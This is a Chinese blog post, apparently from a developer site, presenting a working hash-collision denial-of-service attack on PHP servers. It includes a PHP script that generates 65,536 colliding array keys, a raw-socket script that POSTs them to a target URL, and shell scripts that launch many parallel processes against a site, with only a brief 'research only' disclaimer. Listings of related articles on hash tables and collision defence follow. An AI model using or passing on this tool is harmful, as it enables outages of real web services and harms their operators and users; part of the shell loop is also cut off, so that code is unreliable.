php hash实例,PHP中的hash碰撞的攻击实例

最新推荐文章于 2021-07-09 20:41:49 发布
最新推荐文章于 2021-07-09 20:41:49 发布
阅读量147 收藏
点赞数
文章标签: php hash实例

网上还有很多讲解,这里就不介绍了。

介绍个简单的碰撞实例

步骤一:生成一个文件,里面就是我们要使用的参数,也就是一堆要碰撞的hashkey

代码(data.php):

$arr=array();

$t=pow(2,16);

file_put_contents("f.log","");

for($i=0;$i<65536;$i++)

{

file_put_contents("f.log","&".$i*$t."=0",FILE_APPEND);

}

步骤二:构造PHP代码,发送POST请求

下面是发送post请求的PHP代码(dos.php)

$allurl=$argv[1];

$arr=split("/",$allurl);

$srv_ip =$arr[0] ;//你的目标服务地址

$srv_port = 80;

$url = str_replace($srv_ip,"",$allurl); //接收你post的URL具体地址

$fp = '';

$resp_str = '';

$errno = 0;

$errstr = '';

$timeout = 100000000000;

$post_str=file_get_contents("f.log");

// $post_str = "username=demo&str=aaaa";//要提交的内容.

//  echo $post_str;

//echo $url_str;

if ($srv_ip == '' || $url == ''){

echo('ip or dest url empty
');

}

//echo($srv_ip);

$fp = fsockopen($srv_ip,$srv_port,$errno,$errstr,$timeout);

if (!$fp){

echo('fp fail');

}

$content_length = strlen($post_str);

$post_header = "POST $url HTTP/1.1\r\n";

$post_header .= "Content-Type: application/x-www-form-urlencoded\r\n";

$post_header .= "User-Agent: MSIE\r\n";

$post_header .= "Host: ".$srv_ip."\r\n";

$post_header .= "Content-Length: ".$content_length."\r\n";

$post_header .= "Connection: close\r\n\r\n";

$post_header .= $post_str."\r\n\r\n";

fwrite($fp,$post_header);

while(!feof($fp)){

$resp_str .= fgets($fp,512);//返回值放入$resp_str

}

fclose($fp);

echo($resp_str);//处理返回值.

//unset ($resp_str);

?>

很简单,构造请求,只不过post的参数从一个文件获取,就是上一步我们处理好的f.log,然后post给服务器

步骤三:在命令行运行dos.php

很简单 建一个 t.sh ,内容就一行代码:php -f dos.php $1  就是运行上面post数据的php代码

是不是还缺点什么,多进程!

步骤四:模拟多进程

为了模拟多进程形势,我们采用shell后台运行的方法,

再建一个dos.sh脚本,模拟多进程,代码如下:

for((i=1;i

do

sh t.sh $1 &

done;

进程数和攻击地址从命令行传参

使用方法

sh dos.sh www.xxxx.com/index.php 100

第一个参数是网址,第二个参数是要开的进程数量

到这就结束了,基本上是最简单的攻击代码了,不过确实还可以用

0818b9ca8b590ca3270a3433284dd417.png

本文只用于技术研究,作其它用途,后果自负。

无解答案
关注
王帅:深入PHP内核(三)——内核利器哈希表与哈希碰撞攻击
01-30
PHP作为一门简单而强大的语言,能够提供很多Web适用的语言特性。从实践出发,继弱类型变量原理探究后,王帅将继续带大家弄清PHP内核的一些常用部分,本期则是内核利器哈希表与哈希碰撞攻击。在PHP的Zend Engine(下面简称ZE),有一个非常重要的数据结构——哈希表(HashTable)。哈希表在ZE有非常广泛的应用,PHP的复杂数据结构数组和类的存储和访问就是用哈希表来组织,PHP语言结构的常量、变量、函数等符号表也是用它来组织。什么是哈希表呢?哈希表在数据结构也叫散列表。是根据键名经过hash函数计算后,映射到表的一个位置,来直接访问记录,加快了访问速度。在理想情况下,哈
php hash碰撞攻击与防御
赵阳的博客
12-01 1325
一、前言 hash碰撞攻击就是构造恶意的数据是hash表退化为链表,每次插入数据都会遍历链表,消耗大量服务器资源,从而达到攻击目的。php的数组就是利用hash表实现的,对于碰撞的数据,php采用双向链表解决方案,所以可以利用PHP的数组进行hash碰撞攻击。 二、模拟攻击 很多接口都采用json数据格式来传输,通常php都会使用php:input获得数据流,然后使用json_decode解析js...
php 哈希碰撞攻击,浅谈php的哈希碰撞
weixin_26872311的博客
03-29 270
hash table在php由为重要。存储变量的'符号表',array和object存储的数据结构,执行上下文的变量及函数均使用哈希表结构存储。Hash,简单来讲,是一种将任意长度的输入变换成固定长度的输出的算法,固定长度是有取值范围的,所以hash就存在不同数值有相同hash值的可能性,也就是hash碰撞。解决碰撞问题常用的两种方法:碰撞解决大体有两种思路,第一种是根据某种原则将被碰撞数据定为...
深入PHP内核(三)——内核利器哈希表与哈希碰撞攻击
MoeYang
10-24 1151
深入PHP内核(三)——内核利器哈希表与哈希碰撞攻击PHP的Zend Engine(下面简称ZE),有一个非常重要的数据结构——哈希表(HashTable)。哈希表在ZE有非常广泛的应用,PHP的复杂数据结构数组和类的存储和访问就是用哈希表来组织,PHP语言结构的常量、变量、函数等符号表也是用它来组织。 1. 哈希表的基本概念 什么是哈希表呢?哈希表在数据结构也叫散列表。是根据
java hash碰撞分析模拟
放逐的菜鸟的博客
09-14 2891
for java:       依靠相应语言的hashtable/hashmap实现过程(request多为此结构),当不同的key存入时如果hash值相等则以链表方式连接在前面。此漏洞利用碰撞相同的hash值得到一个长链表, 重新get时,map的计算过程会将时间复杂度巨增,原来一个简单的过程将变成一个很费cpu的过程。 常见的服务器会将用户post的数据保存在hashmap. 而向hash
php自定义hash函数实例
10-24
本文详细介绍了在PHP如何实现自定义的哈希(hash)函数,提供了具体的函数实例,并分析了实现哈希函数的技巧。通过实例化的讲解,阐述了创建简单加密功能的方法,并强调了这种方法虽然具有参考价值,但由于其简单...
PHP Hash算法:Times33算法代码实例
10-24
PHP实现Hash算法对于进行安全相关操作非常重要,尤其是在需要快速查找和验证数据时。 PHPHash算法示例包括Times33算法。Times33算法在PHP并没有直接内置实现,它是一种自定义的Hash函数,通过特定的数学...
PHP的password_hash()使用实例
10-26
比如,在Node.js,使用crypto模块的createHash('md5')可以轻松地与PHP的md5散列值校验兼容,但是却无法用来校验password_hash()生成的散列值。 总结来说,虽然使用password_hash()函数创建的散列值在安全性上有...
php 实现Hash表功能实例详解
12-19
在测试代码部分,首先创建了一个`HashTable`实例,然后插入15个键值对,并打印出Hash表的当前状态。接着改变Hash表的大小,再次插入数据并打印,展示了动态调整大小的功能。 然而,由于简单的Hash函数可能导致不同...
密码学大事件!第一例 SHA-1 哈希碰撞实例公布
weixin_33672109的博客
06-02 692
今日有消息报道荷兰阿姆斯特(CWI)研究所和谷歌研究人员发布了世界上第一例公开的SHA-1哈希碰撞实例。 在现实世界里,哈希碰撞事件也确有发生。如利用 MD5 碰撞伪造合法 CA 证书,进而攻击 HTTPS 安全体系。 消息称,CWI 研究所的 Marc Stevens 是此次攻击的关键人物,2016 年找到了SHA-1算法内部的核心组件 interna...
PHP哈希表碰撞攻击原理
韦编二绝
06-15 1165
文章出处:http://blog.codinglabs.org/articles/hash-collisions-attack-on-php.html   最近哈希表碰撞攻击Hashtable collisions as DOS attack)的话题不断被提起,各种语言纷纷招。本文结合PHP内核源码,聊一聊这种攻击的原理及实现。     哈希表碰撞攻击的基本原理         哈
密码学大事件! SHA-1 哈希碰撞实例
linuxprobe2017的博客
03-14 1万+
2017年2月23日,荷兰阿姆斯特丹 Centrum Wiskunde & Informatica (CWI) 研究所和 Google 公司的研究人员 [Marc Stevens (CWI Amsterdam), Elie Bursztein (Google), Pierre Karpman (CWI Amsterdam), Ange Albertini (Google), Yarik Markov (Google), Alex Petit Bianco (Google), Clement Baisse (
hash冲突(碰撞)及解决方法
weixin_43716329的博客
07-09 7939
文章目录一、什么是hash冲突?二、产生hash冲突的原因三、解决hash冲突的4方式1.开放地址方法(1)线性探测(2)再平方探测(3)伪随机探测2.链式地址法(HashMap的哈希冲突解决方法)3.建立公共溢出区4.再哈希法 一、什么是hash冲突? 就是根据key即经过一个函数f(key)得到的结果的作为地址去存放当前的key value键值对(这个是hashmap的存值方式),但是却发现算出来的地址上已经有人先来了 就是相当于你在蹲坑,又有人进来了,但是只有一个坑,就产生了冲突,需要开辟新的空
HASH碰撞
kjfcpua的专栏
03-13 2万+
如果两个输入串的hash函数的值一样,则称这两个串是一个碰撞(Collision)。既然是把任意长度的字符串变成固定长度的字符串,所以必有一个输出串对应无穷多个输入串,碰撞是必然存在的。 一个优良的hash函数 f 应当满足以下三个条件: (1)对于任意y,寻找x,使得f(x)=y,在计算上是不可行的。 (2)给定x1∈A,找x2∈B,,使得f(x1)=f(x2),在计算上是不可
哈希碰撞实战- HashMap 原理
2.wa
01-02 1012
专栏原创出处:github-源笔记文件 ,github-源码 ,欢迎 Star,转载请附上原文出处链接和本声明。 Java 核心知识专栏系列笔记,系统性学习可访问个人复盘笔记-技术博客 Java 核心知识 HashMap 基于 jdk1.8 讲解分析。本篇不涉及太多源码讲解,重点为采用哈希碰撞实战分析处理过程。 如果对红黑树转换为单链表感兴趣,可以修改实战代码进行 remove 操作观察处...
解决Hash碰撞冲突方法总结
热门推荐
zeb_perfect的专栏
09-18 5万+
Hash碰撞冲突 我们知道,对象Hash的前提是实现equals()和hashCode()两个方法,那么HashCode()的作用就是保证对象返回唯一hash值,但当两个对象计算值一样时,这就发生了碰撞冲突。如下将介绍如何处理冲突,当然其前提是一致性hash。 1.开放地址法 开放地执法有一个公式:Hi=(H(key)+di) MOD m i=1,2,…,k(k 其,m为哈希表的表长。d
如何解决PHP哈希函数的碰撞
lifushan123的专栏
05-01 787
最近想使用Hash函数来根据一个字符串来生成一个惟一的值,但是没找到好用的Hash函数,像PHP内置的MD5、SHA等哈希函数生成的值太长,我没法用,想截取,这样做又担心会出现哈希碰撞,特来拜求高人们用的是什么哈希函数 虽然说采用什么哈希算法要看数据而定,但连MD5再嫌长,可真的有些难办了。其实我很想听听为什么“哈希函数生成的值太长,我没法用”。如果是没有任何评估,单凭感觉就这么说,那真的太
从头认识java-15.7 Map(4)-介绍HashMap的工作原理-hash碰撞(经常作为面试题)
raylee2007的专栏
01-02 6663
这一章节我们来讨论一下hash碰撞。1.什么是hash碰撞?就是两个对象的key的hashcode是一样的,这个时候怎么get他的value呢?答案是通过equals遍历table那个位置上面的Entry链表。2.例子正常的例子:package com.ray.ch14; import java.util.HashMap; public class Test { public static
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值